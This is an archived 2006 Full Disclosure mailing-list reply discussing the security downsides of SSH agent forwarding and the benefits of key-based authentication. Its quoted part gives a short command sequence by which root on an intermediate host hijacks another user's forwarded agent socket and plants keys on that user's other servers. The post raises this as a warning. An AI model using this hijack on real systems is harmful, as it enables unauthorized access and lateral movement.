Full Disclosure mailing list archives
Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding
From: Raj Mathur <raju () linux-delhi org>
Date: Sat, 25 Feb 2006 00:13:02 +0530
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
"Andrew" == Andrew McGill <andrew2005 () ledge co za> writes:
Andrew> Here's something you missed in the "Cons" section of agent Andrew> forwarding: Andrew> lala@local: ssh-add lala@local: (enter key) lala@local: Andrew> ssh -A customer Andrew> lala@customer: ssh remote Andrew> lala@remote: sleep 86400 Andrew> And while you are sleeping: root@customer does this: Andrew> export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' Andrew> | head -1` ssh-copy-id lala@remote ssh-copy-id lala@local Andrew> ssh-copy-id lala@othercustomer ssh-copy-id lala@lalaland Andrew> (Oops) (that's a lot easier than subverting ssh to insert Andrew> something evil into the stream that will hack into the Andrew> remote) Andrew> If there are untrusted machines involved you may prefer Andrew> this: Andrew> ssh-add -c Andrew> Note that ssh-agent does not identify the origin of Andrew> requests for authentication (a bug?), so its confirmation Andrew> is not fail-safe. You can also add in the Pros of using key-based authentication: If you have multiple administrators for a server farm, grant them only key-based authentication. Then when an administrator leaves the company (or is redeployed within the organisation), you only need to delete her key from authorized_keys and she's immediately locked out of the servers. The older method was to change the password on each server (painful) and communicate the batch of new passwords to the remaining administrators (insecure). Regards, - -- Raju - -- Raj Mathur raju () kandalaya org http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.8 <http://mailcrypt.sourceforge.net/> iD8DBQFD/1O1yWjQ78xo0X8RAmSNAJ0SeYBaLi4MTdUalq7bzrgTNR3uDgCdHksG h9M/d2puAYt6QFqjcvAEaew= =kBYi -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Tech Tip: An Illustrated Guide to SSH Agent Forwarding Steve Friedl (Feb 22)
- Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding Andrew McGill (Feb 24)
- Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding Raj Mathur (Feb 24)
- Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding Andrew McGill (Feb 24)